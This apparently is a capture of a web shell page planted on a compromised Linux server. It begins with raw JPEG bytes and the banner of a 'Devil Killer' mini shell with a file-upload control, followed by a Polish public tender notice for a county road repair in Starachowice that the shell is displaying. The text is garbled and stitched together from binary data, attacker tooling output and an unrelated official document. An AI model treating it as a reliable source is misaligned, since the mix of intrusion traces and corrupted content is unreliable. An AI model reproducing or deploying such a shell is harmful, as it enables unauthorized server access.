JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220404/0010850902-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont drogi powiatowej nr 0560T Mirzec -Podkowalów - Mirzec -Poddąbrowa od km3+220 do km 3+930 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Starachowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291019637</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ostrowiecka 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Starachowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdp-starachowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdp-starachowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarząd dróg w odniesieniu do dróg powiatowych w zakresie planowania, budowy, modernizacji, utrzymania i ochrony dróg zgodnie z ustawą o drogach publicznych. </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont drogi powiatowej nr 0560T Mirzec -Podkowalów - Mirzec -Poddąbrowa od km3+220 do km 3+930 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-259852c7-b3fd-11ec-9f44-6e63702cb2f7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00108509</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00006216/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Remont drogi powiatowej nr 0560T Mirzec-Podkowalów - Mirzec-Poddąbrowa od km 3+220 do km 3+930</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.zdp-starachowice.pl oraz https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.zdp-starachowice.pl oraz https://miniportal.uzp.gov.pl/<br/><br/>Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub<br/>oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w<br/>Ustawie, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w<br/>ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>W przedmiotowym postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu:<br/>a) miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/<br/>b) ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal,<br/>c) poczty elektronicznej adres e-mail: sekretariat@zdp-starachowice.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”.<br/>11.5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w:<br/>a) Instrukcji użytkownika systemu miniPortal dostępnego pod adresem:<br/>https://miniportal.uzp.gov.pl/Instrukcje<br/>b) Regulaminie korzystania z systemu miniPortal pod adresem:<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi<br/>11.6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150<br/>MB.<br/>11.7. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń<br/>lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji w zależności od<br/>obowiązkowej formy ich przekazania, przyjmuje się datę ich przekazania na ePUAP lub datę ich<br/>przekazania na pocztę elektroniczną (e-mail).<br/>11.8. Zamawiający przekazuje ID postępowania jako załącznik do niniejszej SWZ.<br/>11.9. Dane postępowanie można wyszukać również na Liście wszystkich postępowań na miniPortalu<br/>klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>11.10. W postępowaniu o udzielenie zamówienia składanie oświadczeń, wniosków (innych niż oferta<br/>oraz dokumenty i oświadczenia jakie Wykonawca ma złożyć wraz z ofertą wskazane w ust.9 SWZ),<br/>zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem<br/>dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego<br/>przez miniPortal lub za pomocą poczty elektronicznej na adres e-mail: sekretariat@zdp starachowice.pl. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i<br/>Wykonawcy posługują się numerem postępowania wskazanym w ust.2 pkt. 1 SWZ oraz numerem<br/>ogłoszenia w Biuletynie Zamówień Publicznych lub ID postępowania.<br/>11.11. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty<br/>elektronicznej, email: sekretariat@zdp-starachowice.pl.<br/>11.12. Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do<br/>komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów<br/>elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt 11.11. adres email.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych, 27-200 Starachowice ul. Ostrowiecka 15;<br/><br/>	Inspektorem Ochrony Danych w Zarządzie Dróg Powiatowych w Starachowicach jest Pan Paweł Żłobecki, kontakt pod adresem email: pawel.zlobecki@wp.pl.<br/><br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr ZP.2510.09.2022<br/>pn: „Remont drogi powiatowej nr 0560T Mirzec -Podkowalów - Mirzec -Poddąbrowa od km 3+220 do km 3+930”<br/>obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy z dnia 11 września 2019 r. -Prawo zamówień publicznych (t.j. Dz. U. z 2021r. poz. 1129) „Ustawa Pzp”, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Ustawy Pzp; <br/><br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i ust. 2 z zastrzeżeniem art.74 ust. 3 i 4. Ustawy Pzp; <br/><br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 Ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/><br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/><br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 ust. 1-3 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących.<br/> Pan/Pani jest uprawniony/uprawniona do uzyskania od zamawiającego potwierdzenia czy przetwarzane są jego/jej dane osobowe, a jeżeli ma to miejsce jest uprawniony/ uprawniona do uzyskania dostępu do nich oraz informacji określonych w art. 15 ust.1-3 RODO. <br/>Zamawiający w celu wykonania powyższego obowiązku może żądać od Pana/Pani wskazania dodatkowych informacji mających na celu sprecyzowanie żądania <br/>w szczególności:<br/>podania nazwy lub daty postepowania o udzielenie zamówienia, lub <br/>podania nazwy lub daty zakończonego postepowania o udzielenie zamówienia publicznego;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy <br/>w zakresie niezgodnym z Ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pani/Pan na podstawie art. 18 RODO prawo<br/>żądania od administratora ograniczenia przetwarzania danych osobowych;<br/>Wystąpienie Pana/Pani z żądaniem ograniczenia przetwarzania danych osobowych<br/>nie ogranicza ich przetwarzania do czasu zakończenia postępowania o udzielenie zamówienia. Od dnia<br/>zakończenia postępowania o udzielenie zamówienia wniesienie powyższego żądania spowoduje<br/>ograniczenie przetwarzania Pana/Pani danych osobowych zawartych w protokole i załącznikach do<br/>protokołu. Zamawiający<br/>nie udostępni tych danych, chyba że zajdą przesłanki o których mowa w art. 18 ust. 2 RODO *<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>Ogłoszenie nr 2022/BZP 00030144/01 z dnia 2022-01-21<br/>2022-01-21 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2510.09.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres zamówienia obejmuje:<br/><br/>-	roboty pomiarowe;<br/>-	roboty rozbiórkowe (mechaniczne karczowanie zagajników, mechaniczne karczowanie, ręczna rozbiórka nawierzchni z kostki brukowej betonowej, rozebranie krawężników betonowych, rozebranie obrzeży, rozebranie przepustów rurowych, rozebranie ścianek czołowych, ręczne rozebranie umocnienia rowu, mechaniczne rozebranie nawierzchni zjazdów, wywiezienie gruzu z terenu rozbiórki;<br/> -	roboty ziemne (roboty ziemne wykonywane koparkami przedsiębiernymi, mechaniczne formowanie wraz z zagęszczaniem nasypów, humusowanie i obsianie skarp);<br/> -	konstrukcja nawierzchni jezdni (roboty ziemne wykonywane koparkami podsiębiernymi, podbudowa z piasku stabilizowanego cementem, warstwa dolna podbudowy z kruszyw, doziarnienie na szerokości jezdni kruszywem, frezowanie nawierzchni mineralno-bitumicznej, głęboki recykling MCE nawierzchni istniejącej oraz poszerzeń, nawierzchnie z betonu asfaltowego warstwa asfaltowa wiążąca, warstwa asfaltowa ścieralna;<br/><br/>-	pobocze (roboty ziemne wraz z usunięciem humusu wykonywane koparkami podsiębiernymi, profilowanie i zagęszczenie podłoża, warstwa podbudowy z kruszyw frakcji, wykonanie warstwy odcinającej z piasku stabilizowanego cementem, oporniki – krawężniki betonowe, obrzeża betonowe, stabilizacja pobocza kostką brukową betonową, nawierzchnie z destruktu asfaltowego);<br/>-	zjazdy (wykonanie korytowania pod konstrukcję zjazdów, profilowanie i zagęszczanie podłoża, wykonanie warstwy odcinającej z piasku stabilizowanego cementem, podbudowy z kruszywa łamanego, krawężniki betonowe, obrzeża betonowe, zjazdy z kostki brukowej betonowej, wykonanie nawierzchni z betonu, przebrukowanie istniejących zjazdów z kostki brukowej betonowej);<br/>-	odwodnienie (przepusty rurowe pod zjazdami, ścianki czołowe betonowe, przepust poprzeczny, ścianki czołowe betonowe, podsypka pod ażury betonowe i płytki betonowe, umocnienia skarp i dna rowu płytami betonowymi, koryta krakowskie, koryta przepustowe (żelbetonowe z nakrywą), budowa odwodnienia liniowego, przykanaliki z rur typu PVC, studnia betonowa);<br/>-	wyniesione przejście dla pieszych (wykonanie podbudowy z betonu cementowego, wykonanie wyniesionego przejścia dla pieszych);<br/>-	oznakowanie i elementy bezpieczeństwa ruchu drogowego (znaki pionowe aktywne D-6 wraz z panelem słonecznym, słupki do znaków, tablice znaków drogowych, wykonanie tablicy informacyjnej, barierki chodnikowe, mechaniczne malowanie).<br/>Szczegółowy opis przedmiotu zamówienia zawiera załączony do niniejszego postępowania przedmiar robót oraz Szczegółowe Specyfikacje Techniczne </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45232451-8 - Roboty odwadniające i nawierzchniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">105 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Komisja dokona weryfikacji złożonych ofert. W przypadku gdy wykonawca<br/>nie złożył wymaganych w postępowaniu oświadczeń, dokumentów lub środków podmiotowych czy też<br/>są one niekompletne lub zawierają błędy, Zamawiający wezwie wykonawcę odpowiednio do złożenia,<br/>poprawienia lub uzupełnienia brakujących dokumentów. Komisja zweryfikuje oferty pod kątem<br/>przesłanek do odrzucenia na podstawie art.226 Ustawy, poprawi w ofertach zgodnie z art. 223 ust.2<br/>Ustawy: oczywiste omyłki pisarskie, oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek, inne omyłki polegające na niezgodności oferty z dokumentami<br/>zamówienia, nie powodujące istotnych zmian w treści oferty - niezwłocznie zawiadamiając o tym<br/>Wykonawcę, którego oferta została poprawiona, a także zwróci się o ewentualne wyjaśnienia<br/>dotyczące treści złożonych ofert zgodnie z art. 223 ust. 1 Ustawy oraz ewentualne wyjaśnienia rażąco<br/>niskiej ceny, jeżeli zasadne jest wszczęcie procedury określonej w art.224 Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy którzy nie podlegają wykluczeniu (na<br/>podstawie art. 108 ust 1 pkt. 1-6 oraz art. 109 ust. 1<br/>pkt. 4 Ustawy) oraz spełniają warunki udziału w postępowaniu.<br/><br/><br/>Warunek zostanie spełniony:<br/> <br/> a) jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu<br/> składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym <br/> okresie, zrealizował co najmniej: - jedno zamówienie polegające na <br/> wykonaniu remontu, przebudowy, odbudowy, rozbudowy itp. drogi <br/> klasy minimum L, w ramach którego wykonał nawierzchnię bitumiczną <br/> (warstwa ścieralna) o powierzchni minimum 3 500,00 m2.<br/><br/> b) wykonawca wykaże, że dysponuje lub będzie dysponował osobami które będą <br/> uczestniczyć w wykonaniu zamówienia (osoby skierowane przez wykonawcę <br/> do realizacji zamówienia) legitymujące się kwalifikacjami zawodowymi, <br/> doświadczeniem i wykształceniem odpowiednimi do funkcji jakie zostaną im <br/> powierzone:<br/> <br/> Kierownik budowy – 1 osoba musi posiadać uprawnienia budowlane <br/> wymagane przepisami prawa do pełnienia samodzielnej funkcji technicznej <br/> w zakresie kierowania robotami budowlanymi, specjalność drogowa lub <br/> odpowiadające im ważne uprawnienia budowlane wydane na podstawie <br/> wcześniej obowiązujących przepisów (podstawa prawna Ustawa z dnia 7 lipca<br/> 1994 r. Prawo budowlane).<br/><br/>8.2.2.	Wykonawca może wykazać na stanowisko kierownika budowy osobę będącą obywatelem państwa członkowskiego, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych (m.in. w ustawie z dnia 22.12.2015r., Dz. U. z 2020 poz.220 z późn. zm. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a.	odpis albo informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust.1 pkt.4 Ustawy.<br/><br/> b. jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w kraju, w którym nie wydaje się dokumentów o których mowa w pkt.10.1a to zamiast dokumentów o których mowa w pkt. 10.1a składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia procedury. <br/> Dokumenty te powinny być wystawione nie wcześniej niż 3 miesięcy przed złożeniem.<br/> Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, <br/>o których mowa powyżej, zastępuje się je dokumentem zawierającym 